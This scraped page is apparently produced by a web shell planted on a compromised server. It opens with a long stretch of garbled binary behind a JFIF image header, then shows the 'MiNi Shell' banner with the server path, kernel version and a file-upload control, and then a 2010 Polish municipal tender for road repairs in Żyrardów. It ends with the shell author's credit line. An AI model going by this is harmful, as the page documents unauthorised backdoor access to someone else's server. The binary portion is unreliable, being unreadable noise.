JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100915/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100915/252181-N-2010.html

<p class="kh_header"><b>Żyrardów: Naprawy nawierzchni ulic w granicach administracyjnych Miasta Żyrardowa            w terminie od dnia zawarcia umowy w  2010r. do 31 grudnia 2011r.  
Zakres robót obejmuje 2 zadania :
I.	WYKONANIE  NAPRAW CZĄSTKOWYCH  NAWIERZCHNI                  BITUMICZNYCH  ULIC W GRANICACH  ADMINISTRACYJNYCH MIASTA  ŻYRARDOWA   
II.	RÓWNANIE Z PROFILOWANIEM ORAZ ULEPSZANIE                             NAWIERZCHNI  DRÓG GRUNTOWYCH  MIESZANKĄ  BETONOWĄ LUB  DESTRUKTEM</b><br>
<b>Numer ogłoszenia: 252181 - 2010; data zamieszczenia: 15.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Żyrardów Wydział Gospodarki Komunalnej , Plac Jana Pawła II 1, 96-300 Żyrardów, woj. mazowieckie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zyrardow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Naprawy nawierzchni ulic w granicach administracyjnych Miasta Żyrardowa            w terminie od dnia zawarcia umowy w  2010r. do 31 grudnia 2011r.  
Zakres robót obejmuje 2 zadania :
I.	WYKONANIE  NAPRAW CZĄSTKOWYCH  NAWIERZCHNI                  BITUMICZNYCH  ULIC W GRANICACH  ADMINISTRACYJNYCH MIASTA  ŻYRARDOWA   
II.	RÓWNANIE Z PROFILOWANIEM ORAZ ULEPSZANIE                             NAWIERZCHNI  DRÓG GRUNTOWYCH  MIESZANKĄ  BETONOWĄ LUB  DESTRUKTEM.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Przedmiotem zamówienia są dwa zadania w okresie od dnia zawarcia umowy w 2010r. do 31 grudnia 2011r. 
Zadanie Nr I 
1) Remonty polegające na bieżącym wykonywaniu napraw cząstkowych jezdni o nawierzchni  bitumicznej zgodnie z obowiązującymi  normami budowlanymi i technologią określoną w Specyfikacji technicznej wykonania i odbioru robót, stanowiącej  załącznik nr 1 do SIWZ oraz niezwłoczne zabezpieczenie ubytków        w nawierzchni,  stanowiących zagrożenie dla ruchu drogowego, na drogach zarządzanych przez Prezydenta Miasta Żyrardowa, w okresie od dnia zawarcia umowy w  2010 r. do dnia 31 grudnia  2011 r.
2) Bieżące monitorowanie stanu technicznego nawierzchni asfaltowych dróg, dla celów wyeliminowania ewentualnych zagrożeń dla ruchu kołowego.
W  zakres napraw cząstkowych wchodzi m.in. naprawa nawierzchni jezdni masą z recyklera, uzupełnienie podbudowy, przy równoczesnym prowadzeniu prac za pomocą dwóch recyklerów, regulacja podziemnych urządzeń infrastruktury w tym m.in. : włazów i wpustów ulicznych kanalizacji deszczowej, z odtworzeniem         
nawierzchni do stanu pierwotnego, zabezpieczenie i oznakowanie miejsca robót       
zgodnie z obowiązującymi przepisami.	
Zadanie Nr II 
Równanie z profilowaniem i ulepszaniem nawierzchni gruntowych dróg mieszanką  
betonową lub destruktem (korą asfaltową) w okresie od dnia zawarcia umowy w 2010r.do 31 grudnia 2011r. Przedmiot zamówienia określa szacunkowy zakres robót wyspecyfikowany w załączonym do SIWZ kosztorysie  ślepym - opis  robót i  zakres  tam zawarty stanowią podstawę do określenia ceny ofertowej. Zamawiający zastrzega sobie możliwość zmiany ilości wykonywanych robót z zachowaniem cen jednostkowych. Wskazana w kosztorysie ślepym podstawa wyceny służy oferentowi jedynie jako informacja dotycząca uściślenia opisu robót, natomiast nie zobowiązuje Wykonawcy do wyceny robót w oparciu o ustalone podstawy.
Wartość przedmiotu umowy wynikała będzie z przekazanego w danym roku zakresu robót stosownie do możliwości finansowych gminy.
Szczegółowy zakres robót dla dwóch zadań określony został w :
-  Specyfikacjach technicznych wykonania i odbioru robót - załącznik nr 1 do SIWZ             
-  Kosztorysach ślepych - załącznik nr 2 do SIWZ
Uszczegółowienie zakresu robót następować będzie w protokołach wprowadzenia     na roboty przez Zamawiającego. Na Wykonawcy spoczywa obowiązek oznakowania miejsca robót i bezpiecznego realizowania robót mając na uwadze to, że w czasie prowadzenia prac odcinek drogi nie będzie całkowicie wyłączony z ruchu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>W okresie przygotowania postępowania, Zamawiający nie jest w stanie przewidzieć  dokładnej ilości i głębokości uszkodzeń ( ubytków, wybojów ) w nawierzchniach bitumicznych oraz powierzchni uszkodzeń w nawierzchniach gruntowych ulic, stąd też w oparciu o zrealizowane zakresy robót z poprzednich lat wyszacowano ilości robót dla postępowania uzupełniającego, które przyjęto do 50 % wartości zamówienia podstawowego. W  związku z tym Zamawiający zastrzega sobie możliwość zmiany ilościowego i finansowego zakresu zamówienia stosownie do potrzeb oraz limitu wydatków budżetowych określonych w budżecie Miasta na utrzymanie dróg w poszczególnych latach realizacji zamówienia. Wynagrodzenie Wykonawcy ustalone będzie w oparciu o faktycznie wykonane i odebrane roboty przy uwzględnieniu cen jednostkowych określonych w kosztorysie ofertowym.
Zamawiający dopuszcza możliwość rozliczenia wykonanych i odebranych robót     
fakturami częściowymi (nie częściej niż raz w miesiącu).</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.52-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga aby Wykonawca posiadał uprawnienia budowlane w zakresie specjalności drogowej do kierowania i nadzorowania robót objętych przedmiotem zamówienia dla każdego z zadań, nie podlegania wykluczeniu z postępowania o udzielenie zamówienia (art. 22 ust 1 i 24 ust. 1 i ust. 2 ustawy P. z. p.) 
Za spełnienie tego warunku uznaje się złożenie dokumentów określonych w pkt 15.4, pkt.15.5, pkt 15.6, 15.10 SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga aby Wykonawca zrealizował w okresie ostatnich 5-ch lat         
min. dwóch robót o wartości brutto nie mniejszej niż 200.000,00  zł dla każdego     
zadania, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie,         
z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz  załączeniu 
dokumentów potwierdzających, że roboty zostały wykonane zgodnie  z wiedzą      
techniczną, zasadami sztuki budowlanej, zostały zakończone należycie, solidnie,       
terminowo, bez usterek, 
Za spełnienie tego warunku uznaje się złożenie dokumentów określonych w pkt 15.8  SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga aby Wykonawca dysponował, 
dla zadania nr I - specjalistycznym sprzętem niezbędnym do prawidłowego 
wykonania przedmiotu zamówienia  tj. minimum dwoma sprawnymi recyklerami dla robót asfaltowych pracującymi jednocześnie na rzecz Zamawiającego,    
piłą do cięcia asfaltu, walcem statycznym samojezdnym, samochodem        
skrzyniowym,                 
dla zadania nr II- równiarką, koparko-spycharką, walcem samojezdnym lub ubijarką spalinową, samochodem ciężarowym min. do 5t.
Za spełnienie tego warunku uznaje się złożenie dokumentów określonych 
pkt 15.11 SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga aby Wykonawca dysponował - dla zadania nr I min. jedną osobą z min.5-letnim stażem pracy w podmiotach gospodarczych wykonujących roboty budowlane, drogowe posiadającej uprawnienia do kierowania i nadzoru nad     robotami budowlanymi w specjalności drogowej, bez ograniczeń, a dla zadania nr II, minimum dwoma osobami, które będą uczestniczyć w wykonaniu zamówienia, posiadających niezbędne kwalifikacje zawodowe, doświadczenie  z zakresu wykonywanych przez nie czynności tj. uprawnienia operatora równiarki, operatora  walca, kierowcy uprawnionego do prowadzenia samochodu skrzyniowego.
Za spełnienie tego warunku uznaje się złożenie dokumentów określonych w pkt. 15.9,SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga aby Wykonawca przedłożył do oferty dowód opłacenia      
polisy ubezpieczeniowej w okresie realizacji zamówienia o wartości ubezpieczenia 
min. 200 000,00 zł dla każdego zadania.
Za spełnienie tego warunku uznaje się złożenie dokumentów określonych w pkt 15.7 SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zyrardow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Żyrardowa, Plac Jana Pawła II nr 1, 96-300 Żyrardów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.09.2010 godzina 12:00, miejsce: Urząd Miasta Żyrardowa, Wydział Gospodarki Komunalnej , Plac Jana Pawła II nr 1 pok. 29.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie I -  WYKONANIE  NAPRAW CZĄSTKOWYCH  NAWIERZCHNI BITUMICZNYCH  ULIC W GRANICACH  ADMINISTRACYJNYCH MIASTA ŻYRARDOWA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remonty polegające  na bieżącym wykonywaniu napraw cząstkowych jezdni o nawierzchni  bitumicznej zgodnie z obowiązującymi  normami budowlanymi i technologią określoną w Specyfikacji technicznej wykonania i odbioru robót, stanowiącej  załącznik nr 1 do SIWZ oraz niezwłoczne zabezpieczenie ubytków w nawierzchni,  stanowiących zagrożenie dla ruchu drogowego, na drogach zarządzanych przez Prezydenta Miasta Żyrardowa, w okresie od dnia zawarcia umowy w  2010 r. do dnia 31 grudnia  2011 r.
2) Bieżące monitorowanie stanu technicznego nawierzchni asfaltowych dróg, dla celów wyeliminowania ewentualnych zagrożeń dla ruchu kołowego.
W zakres napraw cząstkowych wchodzi m.in. naprawa nawierzchni jezdni masą z recyklera, uzupełnienie podbudowy, przy równoczesnym prowadzeniu prac za pomocą dwóch recyklerów, regulacja podziemnych urządzeń infrastruktury                     
w tym m.in. : włazów i wpustów ulicznych kanalizacji deszczowej, z odtworzeniem nawierzchni do stanu pierwotnego, zabezpieczenie i oznakowanie miejsca robót       
zgodnie z obowiązującymi przepisami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.52-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie II - RÓWNANIE Z PROFILOWANIEM I ULEPSZANIE NAWIERZCHNI GRUNTOWYCH DRÓG MIESZANKĄ BETONOWĄ ORAZ DESTRUKTEM NA ULICACH W GRANICACH ADMINISTRACYJNYCH MIASTA ŻYRARDOWA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Równanie z profilowaniem i ulepszaniem nawierzchni gruntowych dróg mieszanką  
betonową lub destruktem (korą asfaltową) w okresie od dnia zawarcia umowy w 2010r.do 31 grudnia 2011r. Przedmiot zamówienia określa szacunkowy zakres robót wyspecyfikowany w załączonym do niniejszej SIWZ, kosztorysie  ślepym- opis  robót i zakres tam zawarty stanowią podstawę do określenia ceny ofertowej. Zamawiający zastrzega sobie możliwość zmiany ilości wykonywanych robót z zachowaniem cen jednostkowych. Wskazana w kosztorysie ślepym podstawa wyceny służy oferentowi jedynie jako informacja dotycząca uściślenia opisu robót, natomiast nie zobowiązuje Wykonawcy do wyceny robót w oparciu o ustalone podstawy.
Szczegółowy zakres robót dla dwóch zadań określony został w :
-  Specyfikacjach technicznych wykonania i odbioru robót - załącznik nr 1 do SIWZ             
-  Kosztorysach ślepych - załącznik nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.52-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com